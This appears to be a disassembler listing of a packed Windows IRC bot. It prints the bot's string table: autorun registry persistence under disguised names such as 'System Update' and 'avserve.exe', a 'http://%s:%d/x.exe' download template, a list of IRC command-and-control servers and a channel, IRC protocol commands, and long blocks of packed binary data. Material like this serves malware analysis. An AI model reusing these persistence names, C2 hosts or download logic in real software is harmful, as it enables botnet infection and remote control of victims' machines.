aU8 db 'u8',0 ; DATA XREF: sub_31501D96+75�o
align 4
aU13ix db 'u13ix',0 ; DATA XREF: sub_31501D96+69�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_31501D96+5D�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_31501D96+51�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_31501D96+45�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_31501D96+3B�o
align 4
aU13_2ix db 'u13.2ix',0 ; DATA XREF: sub_31501D96+22�o
asc_31505B8C db 0Dh,0Ah,0 ; DATA XREF: sub_31501F6B+124�o
align 10h
aUseridUnix db ' : USERID : UNIX : ',0 ; DATA XREF: sub_31501F6B+104�o
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31502277+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_31501BA8+23�o
; sub_31502548+5F�o ...
align 4
aSystemUpdate db 'System Update',0 ; DATA XREF: sub_31501BA8+1C�o
; sub_315025F6+87�o ...
align 4
aZxfbioszeqz db 'zxfbioszeqz',0 ; DATA XREF: sub_315026C2+57�o
; sub_315026C2+8A�o
align 10h
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_315026C2+32�o
aClient db 'Client',0 ; DATA XREF: sub_315026C2+BC�o
; sub_315026C2+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_315026C2+37�o
; sub_315026C2+75�o
align 4
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_31502548+4E�o
align 4
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_31502548+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_31502548+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_31502548+39�o
align 4
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_31502548+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_31502548+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_31502548+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_31502548+1D�o
align 10h
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_31502548+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_31502548+F�o
align 10h
asc_31505CF0: ; DATA XREF: sub_315025F6+56�o
; sub_31503608+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_315026C2+B7�o
unicode 0, <1>,0
dword_31505CF8 dd 206h, 2400h, 31415352h, 800h, 10001h, 0A495BDEFh, 0DD499F8Eh
; DATA XREF: sub_3150283F+3A�o
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 749AC3F2h, 4D855620h, 0AD0FE1CCh, 691506D3h, 0A8FD8D37h
dd 700B1698h, 45504FCEh, 324A3914h, 5C10E3EFh, 0DFBDD847h
dd 371EBA84h, 8B817380h, 7D4A0DF5h, 2DFE92E0h, 0C699C9C5h
dd 9C85E020h, 6A5068BDh, 8250B629h, 7F42C334h, 1C980811h
dd 9CE7B7B2h, 3D77899Dh, 0A4D3971Ah, 0A58D5029h, 8D463A96h
dd 1612E8FCh, 44AF10EBh, 0D0F84570h, 0B178966Ah, 0EB51439Fh
dd 7086A827h, 0DE098A39h, 0C1A1C214h, 0BF167A53h, 611A85C4h
dd 9829E70Fh, 8966209Eh, 0CB1FE53h, 0ECCA9407h, 0A11E75A3h
dd 0B4E8F91Dh, 1A4ECBC5h, 69D7F0DBh, 8C1A8739h, 18C67B94h
dd 3EB38213h, 0E0424BBFh, 8400EB67h, 0AA60B737h, 22D7D8B3h
dd 7A650480h, 86FF4BA6h, 0F6458558h, 56EEF96Eh, 32002FC9h
dd 0B7A63B4Ah, 0EBD3D87Ah
aCont db 'cont',0 ; DATA XREF: sub_31502826+3�o
align 4
off_31505E14 dd offset aMoscowAdvokat_ ; DATA XREF: UPX0:315034C8�r
; UPX0:3150351A�r
; "moscow-advokat.ru"
dd offset aGraz_at_eu_und ; "graz.at.eu.undernet.org"
dd offset aFlanders_be_eu ; "flanders.be.eu.undernet.org"
dd offset aCaen_fr_eu_und ; "caen.fr.eu.undernet.org"
dd offset aBrussels_be_eu ; "brussels.be.eu.undernet.org"
dd offset aLosAngeles_ca_ ; "los-angeles.ca.us.undernet.org"
dd offset aWashington_dc_ ; "washington.dc.us.undernet.org"
dd offset aLondon_uk_eu_u ; "london.uk.eu.undernet.org"
dd offset aLia_zanet_net ; "lia.zanet.net"
dd offset aGaspode_zanet_ ; "gaspode.zanet.org.za"
dd offset aDiemen_nl_eu_u ; "diemen.nl.eu.undernet.org"
dd offset aLulea_se_eu_un ; "lulea.se.eu.undernet.org"
dd offset aCoins_dal_net ; "coins.dal.net"
dd offset aBroadway_ny_us ; "broadway.ny.us.dal.net"
dd offset aOzbytes_dal_ne ; "ozbytes.dal.net"
dd offset aVancouver_dal_ ; "vancouver.dal.net"
dd offset aViking_dal_net ; "viking.dal.net"
dd offset aCed_dal_net ; "ced.dal.net"
dd offset aQis_md_us_dal_ ; "qis.md.us.dal.net"
aQis_md_us_dal_ db 'qis.md.us.dal.net',0 ; DATA XREF: UPX0:31505E5C�o
align 4
aCed_dal_net db 'ced.dal.net',0 ; DATA XREF: UPX0:31505E58�o
aViking_dal_net db 'viking.dal.net',0 ; DATA XREF: UPX0:31505E54�o
align 10h
aVancouver_dal_ db 'vancouver.dal.net',0 ; DATA XREF: UPX0:31505E50�o
align 4
aOzbytes_dal_ne db 'ozbytes.dal.net',0 ; DATA XREF: UPX0:31505E4C�o
aBroadway_ny_us db 'broadway.ny.us.dal.net',0 ; DATA XREF: UPX0:31505E48�o
align 4
aCoins_dal_net db 'coins.dal.net',0 ; DATA XREF: UPX0:31505E44�o
align 4
aLulea_se_eu_un db 'lulea.se.eu.undernet.org',0 ; DATA XREF: UPX0:31505E40�o
align 4
aDiemen_nl_eu_u db 'diemen.nl.eu.undernet.org',0 ; DATA XREF: UPX0:31505E3C�o
align 4
aGaspode_zanet_ db 'gaspode.zanet.org.za',0 ; DATA XREF: UPX0:31505E38�o
align 4
aLia_zanet_net db 'lia.zanet.net',0 ; DATA XREF: UPX0:31505E34�o
align 4
aLondon_uk_eu_u db 'london.uk.eu.undernet.org',0 ; DATA XREF: UPX0:31505E30�o
align 4
aWashington_dc_ db 'washington.dc.us.undernet.org',0 ; DATA XREF: UPX0:31505E2C�o
align 4
aLosAngeles_ca_ db 'los-angeles.ca.us.undernet.org',0 ; DATA XREF: UPX0:31505E28�o
align 4
aBrussels_be_eu db 'brussels.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E24�o
aCaen_fr_eu_und db 'caen.fr.eu.undernet.org',0 ; DATA XREF: UPX0:31505E20�o
aFlanders_be_eu db 'flanders.be.eu.undernet.org',0 ; DATA XREF: UPX0:31505E1C�o
aGraz_at_eu_und db 'graz.at.eu.undernet.org',0 ; DATA XREF: UPX0:31505E18�o
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00003000 ( 12288.)
; Section size in file : 00003000 ( 12288.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31506000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
aMoscowAdvokat_ db 'moscow-advokat.ru',0 ; DATA XREF: UPX0:off_31505E14�o
; UPX1:31508401�o
align 4
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31502CB7+1C�o
align 10h
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31502CB7+C�o
align 4
aUserS8S db 'USER %s 8 * :%s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+1C4�o
align 10h
aAlready db 'already',0 ; DATA XREF: sub_31502DEC+133�o
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+D9�o
; sub_31502DEC+165�o
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_31502DEC+9C�o
align 10h
aPongS db 'PONG%s',0Dh,0Ah,0 ; DATA XREF: sub_3150302E+4F�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_3150302E+C�o
; sub_315030B1:loc_31503153�o
align 4
a451 db '451',0 ; DATA XREF: sub_315030B1+8E�o
aJoinS db 'JOIN %s',0Dh,0Ah,0 ; DATA XREF: sub_315030B1+16�o
align 4
aQuitS db 'QUIT %s',0Dh,0Ah,0 ; DATA XREF: sub_31503183+2C�o
align 10h
aPrivmsgSS db 'PRIVMSG %s %s',0Dh,0Ah,0 ; DATA XREF: sub_315032FA+3B�o
aTaty db '#taty',0 ; DATA XREF: UPX0:3150356A�o
align 4
a13 db '13',0 ; DATA XREF: UPX0:31503460�o
align 4
a_: ; DATA XREF: UPX0:31503455�o
unicode 0, <_>,0
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31503608+13�o
align 4
aJoin db 'JOIN',0 ; DATA XREF: sub_31503722+2E8�o
align 4
aQ: ; DATA XREF: sub_31503722+2C3�o
unicode 0, <q>,0
aDD13SD db '%d,%d,13%s,%d',0 ; DATA XREF: sub_31503722+29D�o
align 10h
aI: ; DATA XREF: sub_31503722+253�o
unicode 0, <i>,0
asc_31506124: ; DATA XREF: sub_31503722+23A�o
unicode 0, <|>,0
aE: ; DATA XREF: sub_31503722+146�o
unicode 0, <e>,0
a1D db '-1,%d',0 ; DATA XREF: sub_31503722+78�o
align 4
dd 9 dup(0)
dword_31506158 dd 0 ; DATA XREF: sub_31501A62+C7�r
; sub_31501BA8+80�w
dword_3150615C dd 0 ; DATA XREF: sub_31501A62:loc_31501B51�o
; sub_31501BA8+2D�w ...
dword_31506160 dd 0 ; DATA XREF: sub_31501A62+79�r
; sub_31501A62:loc_31501B10�r ...
dword_31506164 dd 68h ; DATA XREF: sub_315017AF+C2�r
; UPX0:31501D40�w ...
dword_31506168 dd 0 ; DATA XREF: sub_31501D82+2�r
; sub_31501D96+33�w
dword_3150616C dd 8 dup(0) ; DATA XREF: sub_31501F6B+2E�o
dword_3150618C dd 0 ; DATA XREF: sub_31501BA8+E0�w
; sub_31502277+20�r
dword_31506190 dd 31500000h ; DATA XREF: sub_315017AF+6�r
; UPX0:31501D25�w
dword_31506194 dd 0 ; DATA XREF: sub_31502128+37�o
; sub_315021B0+53�o ...
dword_31506198 dd 0 ; DATA XREF: UPX0:31502314�w
; UPX0:31502326�w ...
word_3150619C dw 0 ; DATA XREF: sub_315020C4+3B�r
; sub_31502128:loc_31502189�r ...
align 10h
dword_315061A0 dd 0 ; DATA XREF: sub_315026C2+25�w
; sub_315026C2+110�w ...
dword_315061A4 dd 0 ; DATA XREF: UPX0:3150341D�w
; UPX0:31503553�w ...
dword_315061A8 dd 0 ; DATA XREF: UPX0:loc_31503476�o
; sub_31503722+E8�r ...
dword_315061AC dd 8 dup(0) ; DATA XREF: UPX0:3150347E�o
; sub_31503722+A�o
dword_315061CC dd 38Dh dup(0) ; DATA XREF: sub_31503722+263�o
dd 0C4h, 40h, 74736C01h, 706D6372h, 47010041h, 6F4C7465h
dd 656C6163h, 6F666E49h, 53010041h, 75437465h, 6E657272h
dd 72694474h, 6F746365h, 417972h, 69725701h, 69466574h
dd 100656Ch, 53746547h, 65747379h, 6D69546Dh, 53010065h
dd 65747379h, 6D69546Dh, 466F5465h, 54656C69h, 656D69h
dd 72695601h, 6C617574h, 65657246h, 69560100h, 61757472h
dd 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh, 6C694665h
dd 6D614E65h, 1004165h, 7274736Ch, 69706D63h, 47010041h
dd 79537465h, 6D657473h, 65726944h, 726F7463h, 1004179h
dd 7274736Ch, 41746163h, 6F430100h, 69467970h, 41656Ch
dd 6E695701h, 63657845h, 72430100h, 65746165h, 6C6F6F54h
dd 706C6568h, 6E533233h, 68737061h, 100746Fh, 636F7250h
dd 33737365h, 72694632h, 1007473h, 6D726554h, 74616E69h
dd 6F725065h, 73736563h, 72500100h, 7365636Fh, 4E323373h
dd 747865h, 74736C01h, 79706372h, 43010041h, 74616572h
dd 65764565h, 41746Eh, 69615701h, 726F4674h, 676E6953h
dd 624F656Ch, 7463656Ah, 65440100h, 6574656Ch, 656C6946h
dd 47010041h, 614C7465h, 72457473h, 726F72h, 69784501h
dd 6F725074h, 73736563h, 736C0100h, 656C7274h, 100416Eh
dd 65656C53h, 6C010070h, 63727473h, 416E7970h, 65470100h
dd 72754374h, 746E6572h, 636F7250h, 737365h, 74654701h
dd 636F7250h, 72646441h, 737365h, 616F4C01h, 62694C64h
dd 79726172h, 57010041h, 65746972h, 636F7250h, 4D737365h
dd 726F6D65h, 43010079h, 65736F6Ch, 646E6148h, 100656Ch
dd 6E65704Fh, 636F7250h, 737365h, 74654701h, 75646F4Dh
dd 6148656Ch, 656C646Eh, 47010041h, 69547465h, 6F436B63h
dd 746E75h, 65724301h, 4D657461h, 78657475h, 43010041h
dd 74616572h, 72685465h, 646165h, 65724301h, 50657461h
dd 65636F72h, 417373h, 74655301h, 6E657645h, 4F010074h
dd 456E6570h, 746E6576h, 45010041h, 54746978h, 61657268h
dd 49010064h, 7265746Eh, 6B636F6Ch, 6E496465h, 6D657263h
dd 746E65h, 61655201h, 6C694664h, 47010065h, 69467465h
dd 6953656Ch, 100657Ah, 61657243h, 69466574h, 41656Ch
dd 0D100h, 0
dd 72430100h, 43747079h, 74616572h, 73614865h, 43010068h
dd 74707972h, 68736148h, 61746144h, 72430100h, 56747079h
dd 66697265h, 67695379h, 7574616Eh, 416572h, 79724301h
dd 65447470h, 6F727473h, 73614879h, 43010068h, 74707972h
dd 74736544h, 4B796F72h, 1007965h, 70797243h, 6C655274h
dd 65736165h, 746E6F43h, 747865h, 79724301h, 63417470h
dd 72697571h, 6E6F4365h, 74786574h, 43010041h, 74707972h
dd 6F706D49h, 654B7472h, 52010079h, 72436765h, 65746165h
dd 4579654Bh, 1004178h, 53676552h, 61567465h, 4565756Ch
dd 1004178h, 51676552h, 79726575h, 756C6156h, 41784565h
dd 65520100h, 65704F67h, 79654B6Eh, 417845h, 67655201h
dd 656C6544h, 61566574h, 4165756Ch, 65520100h, 6F6C4367h
dd 654B6573h, 41010079h, 74726F62h, 74737953h, 68536D65h
dd 6F647475h, 416E77h, 0DE00h, 0F800h, 74610100h, 100696Fh
dd 6E617461h, 69730100h, 6301006Eh, 100736Fh, 5F48455Fh
dd 6C6F7270h, 100676Fh, 78435F5Fh, 61724678h, 6148656Dh
dd 656C646Eh, 73010072h, 68637274h, 73010072h, 70637274h
dd 73010079h, 61637274h, 5F010074h, 65637865h, 685F7470h
dd 6C646E61h, 337265h, 72747301h, 727473h, 6E617201h, 73010064h
dd 646E6172h, 656D0100h, 7970636Dh, 74730100h, 6E656C72h
dd 656D0100h, 7465736Dh, 0E90000h, 13C0000h, 77010000h
dd 69727073h, 4166746Eh, 65470100h, 726F4674h, 6F726765h
dd 57646E75h, 6F646E69h, 46010077h, 57646E69h, 6F646E69h
dd 1004177h, 57746547h, 6F646E69h, 72685477h, 50646165h
dd 65636F72h, 64497373h, 0F40000h, 1500000h, 49010000h
dd 7265746Eh, 4F74656Eh, 556E6570h, 416C72h, 746E4901h
dd 656E7265h, 65704F74h, 100416Eh, 65746E49h, 74656E72h
dd 64616552h, 656C6946h, 6E490100h, 6E726574h, 65477465h
dd 6E6F4374h, 7463656Eh, 74536465h, 657461h, 10000h, 16400h
dd 12FF00h, 0FF0008FFh, 2FF0073h, 0DFF00h, 0FF0001FFh
dd 6FFF0039h, 0BFF00h, 0FF0034FFh, 0CFF0017h, 9FF00h, 0FF0004FFh
dd 10FF0013h, 16FF00h, 3FFh, 0
dd 4550h, 2014Ch, 40D3275Dh, 2 dup(0)
dd 10F00E0h, 6010Bh, 3400h, 1200h, 0
dd 1D18h, 1000h, 5000h, 31500000h, 1000h, 200h, 4, 0
dd 4, 0
dd 7000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 3B68h, 8Ch, 14h dup(0)
dd 1000h, 1B0h, 6 dup(0)
dd 7865742Eh, 74h, 3330h, 1000h, 3400h, 400h, 3 dup(0)
dd 0E0040020h, 7461642Eh, 61h, 11CDh, 5000h, 1200h, 3800h
dd 3 dup(0)
dd 0C0000040h, 6000h, 3DA4h, 652Ch, 0C48BC800h, 0BC4B56DDh
dd 8BE18B0Ch, 0C371406Ah, 23231C47h, 5182363h, 9F080C14h
dd 4232323h, 8410FC00h, 7CF83A10h, 107C777Eh, 0E8B81078h
dd 6EFBE9BBh, 0B8E6B56h, 0D01D0CECh, 163B40B8h, 27EFBAE9h
dd 930520CCh, 1308E719h, 0CD180701h, 57850802h, 0F7C90B07h
dd 2F2B0096h, 0BE4A0030h, 4EE0E2E7h, 41601F57h, 57D93758h
dd 9ED0h, 443FFFBh, 746858EBh, 2F3A7074h, 3732312Fh, 0FF01302Eh
dd 31BFFD91h, 3030383Ah, 652E652Fh, 0DF6578h, 697A6F4Dh
dd 6D616C6Ch, 2FDBFFFFh, 5DDF2734h, 0B966C933h, 758D01F1h
dd 8AFE8B05h, 7993C06h, 0FF8ADF46h, 302C06BFh, 88993446h
dd 0EDE24707h, 0DAE80AEBh, 65622EFAh, 0FF6FFF67h, 93712EFBh
dd 1201C999h, 0FD91BDFDh, 72C10716h, 0FD42AA68h, 10FDAA66h
dd 0FBADD8BAh, 0A91C14F7h, 0F3C91A98h, 8608F198h, 10C57102h
dd 0FFD9FD87h, 37CB5F90h, 1C965992h, 0E4143A78h, 0A7D7157h
dd 0F6DF7D3Ah, 0F34571C9h, 8904F19Dh, 9C04F109h, 0CE91FEC7h
dd 67B44011h, 10F0E3F3h, 0B20BD11Ch, 0F7FB1B59h, 0C99B6076h
dd 14D90125h, 0CA17A204h, 0F9647F99h, 688D2B58h, 1AAE9161h
dd 1D966661h, 0DADEDB11h, 50B22867h, 149900C8h, 265557DCh
dd 0DBBDBF12h, 0C0A44E3Fh, 99491291h, 54F7EDh, 0CA3AC414h
dd 0FBBB0FCBh, 1C3C71D9h, 21E424FFh, 0CDCDCF1Ah, 0F72C668Fh
dd 8166D93Fh, 0B0FB133Fh, 0CDC383B8h, 64A85D12h, 0C96CDF3Bh
dd 0AE251DCBh, 93FD0C24h, 485AFEC9h, 14C096A6h, 0A7294C1Ch
dd 609CF3EBh, 0BA9767EFh, 0F43416EAh, 0DBF57126h, 0FFF77ECDh
dd 0EF133BF9h, 376B4629h, 4766DE5Fh, 0B7AAA8ECh, 8519F0ABh
dd 1FFFF90h, 0EDFFC5B7h, 0FDE9ECE9h, 0FCE1FCB7h, 0F6FFC999h
dd 0F55BBE5Fh, 0F2E9FCFCh, 0FCF7EBFCh, 0D9ABAAF5h, 0AAF934C7h
dd 9F25B459h, 2AFF97FDh, 0ACC9662Ah, 0B7819093h, 83639D90h
dd 9271CDC9h, 3519BF30h, 0C2FBB083h, 95DC1451h, 2A91720Ah
dd 0D2EEC871h, 0FFFFEDFFh, 80D512A5h, 0AA529AE1h, 2A8D146Fh
dd 12B9C89Ah, 474A9A8Bh, 0AB9E5958h, 0A319DB9Bh, 6FFFFEDFh
dd 0A26CEC20h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h, 1FBDC812h
dd 0EB8D2E96h, 0FFE68584h, 9A85D812h, 99D125Ah, 0F8105A9Ah
dd 0B725D599h, 49FFDDB7h, 0FEFD7F66h, 5AA98712h, 850295C2h
dd 91048212h, 0A89BF35Ah, 0CFF7CB6Dh, 53FF855Dh, 8F72424Dh
dd 1874485Dh, 0FE85C853h, 2006206h, 0FFFFF1ADh, 4E204350h
dd 4F575445h, 50204B52h, 52474F52h, 31204D41h, 0FFFB17CDh
dd 414CF6B1h, 0A024D4Eh, 646E6957h, 2073776Fh, 20726F66h
dd 2DD60357h, 676B7F6Dh, 70756F72h, 611A330Eh, 5E234D27h
dd 32E96C3Eh, 32322158h, 4E312E32h, 6F92054h, 2018DA6Bh
dd 0A470323Ch, 50BB738Bh, 0A07192Bh, 5123FF0Ch, 7D8363h
dd 140A1104h, 0BBD40520h, 0CABB5BE8h, 4B4C0069h, 505353h
dd 0FB829756h, 8C91EDFh, 240057E0h, 64006Eh, 77006Fh, 0F6F63A73h
dd 30749B62h, 398C0901h, 3233500h, 1D44B6E6h, 0DA00072Eh
dd 644E7901h, 0DA2008ABh, 92649A87h, 26039F57h, 6D8360C8h
dd 47234601h, 73FF4007h, 60F23h, 1F011006h, 0E0888A15h
dd 0FF600048h, 4FE5FFh, 6A198144h, 49E4F27Ah, 30AF281Ch
dd 67107425h, 214FE153h, 0DF5C44DFh, 4003075h, 2DAE6BAFh
dd 5ABD075Ch, 8D615C08h, 4D75DC8Dh, 36072Eh, 30772E38h
dd 0DB7BAF61h, 0EC00491Bh, 3B240043h, 2D63003Fh, 64CF201Fh
dd 4DC08A2h, 0E41EC240h, 0FF16BFh, 0E00DEDEh, 19F1600h
dd 37EF2602h, 28404261h, 8B110319h, 0B868DECBh, 0D374D96Ch
dd 2A630070h, 0BE4296DBh, 9F256B9Ch, 75480E10h, 43D81DDh
dd 5413541Bh, 0FB9F265Ah, 5963D6DCh, 0CBC75C22h, 5876545h
dd 0F3483B55h, 10030B00h, 110B848h, 349FFFFBh, 286A0105h
dd 0B10C3919h, 0A89B11D0h, 0D94FC000h, 655FF52Eh, 5D1FF85Fh
dd 1CEB8A88h, 0E89F11C9h, 48102B3Ch, 9F25D160h, 0F40CEC8Bh
dd 0CA060A3h, 790F200Ch, 0CB10CA0h, 4EFFBE00h, 880CA08Eh
dd 90040h, 703ECh, 49E11EC1h, 4F401495h, 0BF40707Ch, 0B2297B22h
dd 13430700h, 3FF09E79h, 138578h, 0E9A65BABh, 2FF81013h
dd 273C635h, 230EFEFFh, 30C1D240h, 84083658h, 0E4F24388h
dd 10B97DD3h, 0B801FFEEh, 0F2200C10h, 0AD793661h, 0F7F070Dh
dd 0E59F25D8h, 70011815h, 90060F84h, 0F84790Fh, 2000F95h
dd 0FC9E4D87h, 6C0F847Fh, 0C89A000Fh, 0A884AADEh, 0CA13436Fh
dd 1F8C093Fh, 50586E69h, 3C725020h, 0C0A6DBh, 39014446h
dd 0C93C6B32h, 123C844Fh, 41027515h, 7B220053h, 941C840Dh
dd 0AFFF9B01h, 0C606EB1Ch, 73255C5Ch, 6370695Ch, 9F816624h
dd 0ECFFF97Fh, 0E4FF071Ch, 44655300h, 67756265h, 6C697669h
dd 41656765h, 0B266DB64h, 73756AFFh, 6B6F5474h, 73176E65h
dd 75126F4Ch, 927F76FDh, 6C615670h, 17416575h, 6F28704Fh
dd 2FFE0C63h, 347324B6h, 76646143h, 33697061h, 12E2AEE3h
dd 6574757Fh, 13316D72h, 0BB036932h, 65A37F12h, 72545F15h
dd 39577961h, 0EF72431Bh, 65DBEDDCh, 65521E61h, 54056F6Dh
dd 56140C68h, 6E747269h, 75B6D6EDh, 5328415Ch, 520F7845h
dd 5F466E72h, 4B35D67Ah, 4822F3F5h, 83505454h, 89712FDEh
dd 5B322040h, 0D4B4F20h, 0DBFD010Ah, 6F4BFDADh, 2D02446Eh
dd 7467044Ch, 25203A68h, 2961ED75h, 282F189Bh, 0F4B97954h
dd 266B7DB6h, 696C70A7h, 15698563h, 0A32D782Fh, 0CB77EED8h
dd 6D6F632Dh, 65CD7270h, 5BDF5764h, 0D4FF28h, 544547h
dd 11640266h, 0DD2BFDA1h, 6D9573D7h, 0B1637673h, 6DA2DDD7h
dd 65017765h, 5F320F08h, 0FDCCDCE6h, 34317517h, 507F703h
dd 9A696E07h, 3132032Eh, 0D8133930h, 38B3937Bh, 2306781Fh
dd 0C9BDC07h, 4F303132h, 7F7F7529h, 0BB2098FBh, 52455355h
dd 4E084449h, 65849h, 48217B59h, 253AE8A1h, 0C5A7CD64h
dd 53FFF2F6h, 5754464Fh, 5C455241h, 736F694Dh, 0DD5CC36Fh
dd 0B783F0D6h, 7275435Ch, 0C8560972h, 0B55CFE73h, 52C3E142h
dd 7953BC75h, 0F25290FDh, 0E7A1877Fh, 6664579Ah, 6E687361h
dd 6473647Ah, 76D6126Ch, 77495313h, 5C573F61h, 0ED860A1h
dd 528B396Ch, 0B44B0D57h, 39C23D6h, 667120F5h, 0F70E86EFh
dd 76206769h, 38761BFDh, 9D326576h, 67B9B64Bh, 10532064h
dd 0B81B6544h, 1421B237h, 1B17235Ch, 9B325C3Fh, 42004CABh
dd 0AC91203Fh, 3D9F1A35h, 0B01EBF23h, 654AD42h, 69443792h
dd 6DBB9E73h, 66EE7694h, 9C6D672Fh, 6C2FF62Ah, 632463C9h
dd 7974690Ah, 6E614D20h, 58C5E91Eh, 31C91AB1h, 0C59DB48Ch
dd 5234D376h, 80E4153h, 0FFFFEFBCh, 0A4C11BFFh, 0DD499F8Eh
dd 64DB1F45h, 0DE5B5C5h, 23CBE2AAh, 63639922h, 7318481Ch
dd 0EDFFFFFFh, 8C9AC3F2h, 0CC4D8556h, 0D3AD0FE1h, 37691506h
dd 98A8FD8Dh, 0CE700B16h, 1445504Fh, 0F837FFFFh, 0EF324A39h
dd 0D847AEE3h, 0BA84DFBDh, 7380371Eh, 0DF58B81h, 92E07D4Ah
dd 0E8DFFFFFh, 0B8C52DFEh, 85E020C6h, 5068BD9Ch, 50B6296Ah
dd 42C33482h, 9808117Fh, 0FFFFFFFFh, 0E7B7B21Ch, 77899D9Ch
dd 0D3971A3Dh, 8D5029A4h, 463A96A5h, 12E8FC8Dh, 0AF10EB16h
dd 0F8457044h, 0FFFFFFEAh, 78966AD0h
dd 51439FB1h, 86A827EBh, 98A3970h, 0A1C214DEh, 167A53C1h
dd 9785C4BFh, 0A0DFA378h, 9829E70Fh, 53899E9Eh, 940724FEh
dd 0FFFFFFFFh, 75A3ECCAh, 0F91DA11Eh, 0CBC5B4E8h, 0F0DB1A4Eh
dd 873969D7h, 7B948C1Ah, 821318C6h, 4BBF3EB3h, 0F02FFFFFh
dd 0EB67E042h, 60B737B2h, 0D7D8B3AAh, 65048022h, 0FF4BA67Ah
dd 45855886h, 0FC1BFFA6h, 0EEF96EF6h, 3290C956h, 0B7A63B4Ah
dd 0EBD3D87Ah, 97EE4263h, 0F7041888h, 31505FE8h, 0A69A03CCh
dd 98B49A69h, 2C3C5878h, 69B2CD34h, 0DC5EF814h, 34D3B4CCh
dd 90A4D34Dh, 0B607480h, 7142E96Dh, 5B6D2E9Fh, 6CDC0575h
dd 0A7685B24h, 0B700492Eh, 96B60D64h, 6BC52C2Dh, 611C67ADh
dd 0DB01F06Eh, 2C7586D8h, 7A6F2F72h, 70DB7962h, 41D9ACBCh
dd 0A4147262h, 0AD600C79h, 58796C25h, 0D6674A38h, 0CA6B46F1h
dd 732E61B6h, 84277578h, 6EC73A36h, 3D2E1646h, 6D80B067h
dd 2FCA468Eh, 51C6C28h, 6734BB7Bh, 116F701Ah, 13617A2Eh
dd 0CF1B66C3h, 61FE3309h, 401A5F13h, 676F8E6Eh, 776B7543h
dd 675DBD90h, 1F74D85Eh, 1FA56364h, 0FCA9EB59h, 2D736F6Ch
dd 0A72E5861h, 6BADB220h, 0AB75E35Bh, 0BE62166Ch, 0B6BB253Dh
dd 7266B92Fh, 4A616C66h, 0EEC09FEh, 61726733h, 74612E7Ah
dd 6D0B8180h, 7736876Dh, 7DBBDA2Dh, 1EE5AE6Ah, 6362CB75h
dd 0BF676621h, 7FDB0BEAh, 6D6C6B6Ah, 71706F6Eh, 77927452h
dd 0DA7A7978h, 0F95FFE58h, 44434241h, 48474645h, 4E4B4A49h
dd 7B5751FCh, 544058A1h, 5A59581Ah, 0F5ADB81Bh, 77A08152h
dd 0B62A2038h, 2140E907h, 0FF8C6702h, 0F60C4BCBh, 4B43CA56h
dd 26501320h, 0F66E9553h, 4E4F0B64h, 490B0A47h, 0FA5DAC3Fh
dd 92353407h, 2F0C4F4Ah, 54495551h, 24816B6Fh, 477B561Ah
dd 0B6E5F766h, 74231163h, 841779B5h, 0C0E0075Fh, 20A202CBh
dd 0BED6F328h, 6203E85Dh, 34203B64h, 36204549h, 0B060915h
dd 0B41EAC30h, 70164035h, 29EC5Fh, 371776Bh, 0CEBA2C61h
dd 4D02E6B5h, 690F075Ch, 8127C03h, 2D6569B7h, 0A6C71331h
dd 0C48A08BBh, 0FFEE4009h, 6C01FF97h, 63727473h, 4741706Dh
dd 6F4C7465h, 656C6163h, 6F666E49h, 56715B0Fh, 44525394h
dd 452E6309h, 797F14B7h, 65595715h, 588A4746h, 9E303483h
dd 0BD9A6954h, 0E6DB997h, 206F540Bh, 0ED65A015h, 4146000Ch
dd 3C42BF0Ch, 4D3F0DF6h, 2DAC646Fh, 0B016614Eh, 8E412D93h
dd 7E5E4169h, 6F40AEFh, 4309DF1Fh, 1E79706Fh, 387BFEE4h
dd 456E6993h, 81516578h, 0ED06FFF6h, 9A6C6F7Eh, 53323370h
dd 7370616Eh, 19746F68h, 0A0CDADDDh, 723212D3h, 5540F73h
dd 0C641AD73h, 0F6182C35h, 2180FB06h, 7478654Eh, 54727068h
dd 7867CB6Ch, 0FF087645h, 538B4661h, 42B7B9B1h, 624F7BE4h
dd 4414996Ah, 0A136796h, 4CB715CFh, 0CAC94561h, 263A15ADh
